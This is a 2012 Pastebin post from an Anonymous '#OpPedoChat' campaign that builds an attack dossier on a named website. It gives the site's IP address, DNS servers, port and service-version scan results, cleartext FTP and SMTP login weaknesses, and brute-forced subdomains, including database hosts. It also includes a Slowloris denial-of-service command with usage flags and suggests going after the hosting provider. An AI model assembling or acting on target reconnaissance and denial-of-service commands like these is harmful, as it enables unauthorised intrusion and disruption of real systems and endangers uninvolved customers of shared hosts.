Advertisement
Wave

#OpPedoChat website information- underlicious.net

Jul 12th, 2012
396
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 4.02 KB | None | 0 0
  1. Twitter -; @WaveAnonops
  2. #OpPedoChat
  3. #EXPECT US
  4. ------------------------------------------------------------------------------
  5. Charging Lulzcannon.
  6. Target acquired: http://underlicious.net/
  7. ------------------------------------------------------------------------------
  8. DNS Servers for underlicious.net:
  9. ns1.dreamhost.com
  10. ns3.dreamhost.com
  11. ns2.dreamhost.com
  12. * Dreamhost is hosting a LOT of these websites. Possible target to consider, but without innocent sites getting damaged. I don't know if they mean to host these sites, or if they are just idiots.*
  13. ---------------------------------------------------------------------------
  14. + Target IP: 173.236.221.101
  15. + Target Hostname: underlicious.net
  16. + Target Port: 80
  17. + Start Time: 2012-07-13 17:29:06
  18. ---------------------------------------------------------------------------
  19. + Server: Apache
  20. + Retrieved x-powered-by header: W3 Total Cache/0.9.2.4
  21. + No CGI Directories found (use '-C all' to force check all possible dirs)
  22. + robots.txt contains 2 entries which should be manually viewed.
  23.  
  24. ------------------------------------------------------------------------------------------
  25.  
  26. Port 21;
  27. The remote FTP server allows the user's name and password to be transmitted in clear text, which could be intercepted by a network sniffer or a man-in-the-middle attack.
  28.  
  29. -----------------------------------
  30. Port 25 and 587;
  31. Synopsis: The remote mail server allows cleartext logins.
  32. 

Description
: The remote host is running an SMTP server that advertises that it allows cleartext logins over unencrypted connections. An attacker may be able to uncover user names and passwords by sniffing traffic to the server if a less secure authentication mechanism (i.e. LOGIN or PLAIN) is used.
  33.  
  34.  
  35.  
  36.  
  37.  
  38. -------------------------------------------------------------------------------
  39. Ports:
  40. Discovered open port 587/tcp on 173.236.221.101
  41. Discovered open port 22/tcp on 173.236.221.101
  42. Discovered open port 554/tcp on 173.236.221.101
  43. Discovered open port 21/tcp on 173.236.221.101
  44. Discovered open port 80/tcp on 173.236.221.101
  45. Discovered open port 5222/tcp on 173.236.221.101
  46. Discovered open port 7070/tcp on 173.236.221.101
  47. Discovered open port 5269/tcp on 173.236.221.101
  48. Discovered open port 555/tcp on 173.236.221.101
  49. Discovered open port 8000/tcp on 173.236.221.101
  50. Discovered open port 8001/tcp on 173.236.221.101
  51.  
  52. rDNS record for 173.236.221.101: apache2-argon.giedi.dreamhost.com
  53.  
  54. PORT STATE SERVICE VERSION
  55. 21/tcp open ftp ProFTPD
  56. 22/tcp open ssh OpenSSH 5.5p1 Debian 6+squeeze2 (protocol 2.0)
  57. 25/tcp open smtp Postfix smtpd
  58. 80/tcp open http Apache httpd
  59. | robots.txt: has 2 disallowed entries
  60. |_/wp-admin/ /wp-includes/
  61. 554/tcp open rtsp Darwin Streaming Server 5.5.5
  62. 555/tcp open rtsp Darwin Streaming Server 5.5.5
  63. 587/tcp open smtp Postfix smtpd
  64. 5222/tcp open jabber Jabber instant messaging server
  65. 5269/tcp open jabber Jabber instant messaging server
  66. 7070/tcp open rtsp Darwin Streaming Server 5.5.5
  67. 8000/tcp open rtsp Darwin Streaming Server 5.5.5
  68. 8001/tcp open rtsp Darwin Streaming Server 5.5.5
  69. Service Info: OS: Linux
  70. ---------------------------------------------------------------------
  71. #####################################################################
  72. APACHE DENIAL OF SERVICE: ha.ckers.org/slowloris/slowloris.pl #
  73. usage: #
  74. perl slowloris.pl -dns sitename.com -num 10000 -tcpto 5 -timeout 10 #
  75. ---------------------------------------------------------------------
  76. Informative DNS bruteforce findings:
  77. 67.205.5.121 db.underlicious.net
  78. 173.236.221.101 ftp.underlicious.net
  79. 67.205.5.121 mysql.underlicious.net
  80. 173.236.221.101 ssh.underlicious.net
  81. 173.236.221.101 www.underlicious.net
  82.  
  83. 173.236.221.0-255 : 3 hostnames found.
  84. 67.205.5.0-255 : 2 hostnames found.
  85. --------------------------------------------------------------------
  86. #We are Anonymous
  87. #We are Legion
  88. #We do not forgive
  89. #We do not forget
  90. #Expect us
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement